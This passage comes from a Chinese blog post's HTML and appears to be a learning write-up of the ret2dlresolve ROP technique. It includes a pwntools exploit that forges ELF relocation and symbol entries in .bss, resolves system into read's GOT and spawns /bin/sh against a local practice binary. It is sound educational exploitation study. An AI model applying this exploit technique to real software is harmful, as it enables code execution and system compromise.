class="hljs-string">&#x27;rker&#x27;</span><br>payload +=  fake_Elf_Rel <span class="hljs-comment"># buf + 0x14 #p32(PLT0)相当于调用_dl_runtime_resolve函数，并且PLT0会提供第一个参数，那么我们就要接着输入第二个参数p32(realoc_index)</span><br>payload += fake_Elf_Sym <span class="hljs-comment"># buf + 0x1c</span><br>payload += <span class="hljs-string">b&quot;puts&quot;</span> + p16(<span class="hljs-number">0</span>) <span class="hljs-comment">#buf+0x34</span><br>payload += <span class="hljs-string">b&quot;harker!&quot;</span><br>io.send(payload)<br>io.interactive()<br><span class="hljs-comment">#pause()</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/ret2alsolve/n.png" srcset="/img/loading.gif" lazyload alt="img"><img src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" srcset="/img/loading.gif" lazyload alt="点击并拖拽以移动"></p>
<p>这个实际上就是重新找libc寻找函数地址，写入got表</p>
<p><img src="/img/ret2alsolve/o.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到我们上面的exp中故意写了read的got表，也就是说他重新再libc文件里面寻找puts函数写入了read的got表的位置，这时候read的got表的位置实际上是puts的真实地址了。</p>
<p>由此我们可以联想到，我们把system函数写入，再输入&#x2F;bin&#x2F;sh\x00,不就可以getshell了吗，事实上也确实如此</p>
<p>getshell exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>io=process(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./ret21&#x27;</span>)<br>leave=<span class="hljs-number">0x080491F2</span><br>ret=<span class="hljs-number">0x804900a</span><br>PLT0=<span class="hljs-number">0x8049020</span><br>buf=elf.bss()+<span class="hljs-number">0x800</span><br>rel_plt=<span class="hljs-number">0x8048398</span><br>dynsym=<span class="hljs-number">0x804821c</span><br>dynstr=<span class="hljs-number">0x80482bc</span><br><span class="hljs-comment">#gdb.attach(io,&#x27;b*vuln&#x27;)</span><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span> + p32(buf) + p32(elf.sym[<span class="hljs-string">&#x27;read&#x27;</span>]) + p32(leave) + p32(<span class="hljs-number">0</span>) + p32(buf) + p32(<span class="hljs-number">0x100</span>)<br>io.sendafter(<span class="hljs-string">b&#x27;&gt; \n&#x27;</span>,payload)<br>sleep(<span class="hljs-number">3</span>)<br><span class="hljs-comment"># set fake_st_name</span><br>fake_st_name = buf + <span class="hljs-number">0x34</span> - dynstr<br><br><span class="hljs-comment"># set fake_Elf_Sym</span><br>r_sym = (buf + <span class="hljs-number">0x1c</span> - dynsym) / <span class="hljs-number">0x10</span> <span class="hljs-comment">#/0x10是为了减掉后1位  例如int(1001/10)=100,最后+7实现把低位变为7</span><br>r_type = <span class="hljs-number">7</span><br>r_info = (<span class="hljs-built_in">int</span>(r_sym) &lt;&lt; <span class="hljs-number">8</span>) + r_type   <span class="hljs-comment">#r_sym对应的是构造的sym在dynsym的偏移，在执行时应该会加上dynsym的地址</span><br>puts_str_addr = <span class="hljs-number">0x80482F3</span><br>fake_Elf_Sym = p32(fake_st_name) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span> + p32(<span class="hljs-number">0x12</span>) + p32(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span><br><br><span class="hljs-comment"># set fake_Elf_Rel</span><br>realoc_index = buf + <span class="hljs-number">0x14</span> - rel_plt <span class="hljs-comment">#plt表中的索引可能是rel_plt到对应结构体的偏移</span><br>fake_Elf_Rel = p32(elf.got[<span class="hljs-string">&#x27;read&#x27;</span>]) + p32(r_info) <span class="hljs-comment">#这里p32(elf.got[&#x27;read&#x27;])的作用是把在libc中的system实际地址写入read的got表处</span><br><br><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">4</span> + p32(PLT0) + p32(realoc_index) + p32(<span class="hljs-number">0</span>) + p32(buf + <span class="hljs-number">0x3c</span>) <span class="hljs-comment">#p32(PLT0)相当于调用_dl_runtime_resolve函数，并且PLT0会提供第一个参数，那么我们就要接着输入第二个参数p32(realoc_index)</span><br>payload +=  fake_Elf_Rel <span class="hljs-comment"># buf + 0x14</span><br>payload += fake_Elf_Sym <span class="hljs-comment"># buf + 0x1c</span><br>payload += <span class="hljs-string">b&quot;system&quot;</span> + p16(<span class="hljs-number">0</span>) <span class="hljs-comment">#buf+0x34</span><br>payload += <span class="hljs-string">b&quot;/bin/sh\x00&quot;</span><br>io.send(payload)<br>io.interactive()<br><span class="hljs-comment">#pause()</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/ret2alsolve/p.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>小白，有错误请指出</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%A0%88%E5%88%A9%E7%94%A8/" class="category-chain-item">栈利用</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%A0%88%E5%88%A9%E7%94%A8/python/" class="category-chain-item">python</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8E%9F%E5%88%9B/" class="print-no-link">#原创</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ROP之ret2alsolve</div>
      <div>http://example.com/2024/04/23/ROP之ret2alsolve/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>清风</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年4月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/06/01/xyctf-hello-world%E4%B9%8B-s%E6%B3%84%E9%9C%B2libc/" title="xyctf_hello_world之%s泄露libc">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">xyctf_hello_world之%s泄露libc</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/21/srop%E7%9A%84%E7%AE%80%E5%8D%95%E4%BD%BF%E7%94%A8/" title="syscall与csu结合以及srop的简单使用">
                        <span class="hidden-mobile">syscall与csu结合以及srop的简单使用</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"0JWcKtnJwUWPWRrrdTax0lya-gzGzoHsz","appKey":"Q6KrvNK2N7nNsewpWYVdjHuI","path":"window.location.pathname","placeholder":"说点什么","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/scrollAnimation.js"></script>
<script src="/js/codeType.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
